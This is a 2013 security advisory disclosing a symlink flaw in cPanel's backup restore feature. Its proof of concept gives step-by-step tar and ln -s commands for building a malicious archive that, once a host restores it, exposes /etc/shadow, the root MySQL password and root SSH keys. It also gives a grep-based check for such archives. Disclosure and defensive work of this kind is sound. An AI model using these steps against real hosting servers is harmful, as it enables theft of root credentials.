cPanel – Backup Restoration Content Disclosure (R911-0007)

Type: Content Disclosure (Root Access)
Impact: High
Product: cPanel
Website: http://www.cpanel.net
Vulnerable Version: 11.38.0.8 and earlier.
Fixed Version: -
CVE: -
R911: 0007
Date: 2013-05-22
By: http://www.rack911.com

Product Description:

cPanel is an easy-to-use control panel that gives web hosts, and the website owners they serve, the ability to quickly and easily manage their servers and websites. Web Host Manager (WHM) is a part of the cPanel software, often used by resellers and system administrators.

Vulnerability Description:

There is a flaw within the import / restore feature that allows an attacker to use a malicious archive to gain access to sensitive files via a symlink attack, due to incorrect handling of the domain log files. When the malicious archive is restored, the symlinks become normal files, which can then be backed up and viewed by the user.

Note: In order for this vulnerability to work, the attacker must social engineer the hosting company into restoring the malicious archive. However, because transferring and restoring accounts is such a common practice in the hosting world, we believe this exploit to be trivial to perform.

Proof of Concept:

Here are the steps to create a malicious cPanel archive that, when restored, will allow you to view /etc/shadow, the root MySQL password in plain text and the default root SSH private key. For demonstration purposes, we will be using attacker.com as our website and have already set up three subdomains:

rootmysql.attacker.com
rootssh.attacker.com
shadow.attacker.com

The subdomains are necessary because the attack relies on symlinks placed where existing domain log files would be; on restore, these symlinks are converted into regular copies of the file they point to.

1. Log into your cPanel account and go to Backups and then Generate a Full Website Backup.

2. If you have SSH access on the same server you can log in; otherwise download the original archive to your computer and upload it to another server where you do have SSH access.

3. Prepare the archive:

tar -xvf backup*.tar.gz
rm backup*.tar.gz
mv backup* cpmove-attack
cd cpmove-attack/logs

4. Prepare the malicious symlinks:

ln -s /etc/shadow shadow.attacker.com
ln -s /root/.my.cnf rootmysql.attacker.com
ln -s /root/.ssh/id_dsa rootssh.attacker.com

5. Repackage the archive:

cd ../../
tar -zcf cpmove-attack.tar.gz cpmove-attack

At this point the malicious archive has been built and you can upload it to the target server and then restore it via WHM using the Restore a Full Backup/cpmove File feature. Another option would be to restore it from the command line:

/scripts/restorepkg --force cpmove-attack.tar.gz

Once the archive has been restored on the target server, log into cPanel as the user and then go back to Backups and then Generate a Full Website Backup. After the new backup has been generated, download it to your computer and extract the contents. There will be a logs directory located under the archive name containing the target files. Simply open them with a text editor and there you go.

Impact:

We rate this vulnerability HIGH because any file can be read regardless of ownership, including root-owned files such as /etc/shadow, the MySQL root password and any private SSH keys. (It is also possible to grab multiple files at once using several symlink attacks within one malicious archive.)

It’s important to note that cPanel has deemed this vulnerability to be “minor” in their eyes, which we view as extremely reckless towards the security of every hosting provider out there. It is their opinion that web hosting providers should not transfer or restore accounts from untrusted sources. As we all know, this practice is extremely common with shared hosting and especially with reseller hosting providers.

We cannot stress enough how inexcusable it is for cPanel to view this flaw as a minor vulnerability. An attacker could create their own malicious archive in minutes and come up with 100 different plausible excuses to have their hosting provider restore the archive without so much as a second thought. We’re trying to make the hosting community safer, but we cannot do it when companies such as cPanel continue to act like this.

Work Around:

Hosting providers who would like to mitigate the risk of the above vulnerability can, for the time being, run the following command against every archive they are about to restore to check for the presence of a possible symlink attack:

tar -ztvf archive.tar.gz | grep ' -> ' | grep -v public_html

If the archive is fine, the command prints nothing. However, if a possible symlink attack is present, then the output will look like this:

root@server [~]# tar -ztvf cpmove-attack.tar.gz | grep ' -> ' | grep -v public_html
lrwxrwxrwx attack/attack     0 2013-05-22 15:32 cpmove-attack/logs/rootmysql.attacker.com -> /root/.my.cnf
lrwxrwxrwx attack/attack     0 2013-05-22 15:32 cpmove-attack/logs/shadow.attacker.com -> /etc/shadow
lrwxrwxrwx attack/attack     0 2013-05-22 15:32 cpmove-attack/logs/rootssh.attacker.com -> /root/.ssh/id_dsa
root@server [~]#

Should you see results like that, you are urged not to restore the backup under any circumstances and to presume that the user is attempting to compromise your security. For now, this is our best advice, but we are working on a better (automated) solution that can be worked into the existing cPanel restore feature. Stay tuned for details; we hope to have something out this week.

Vulnerable Version:

This vulnerability was tested against cPanel (WHM) v11.38.0.8 and is believed to exist in all previous versions.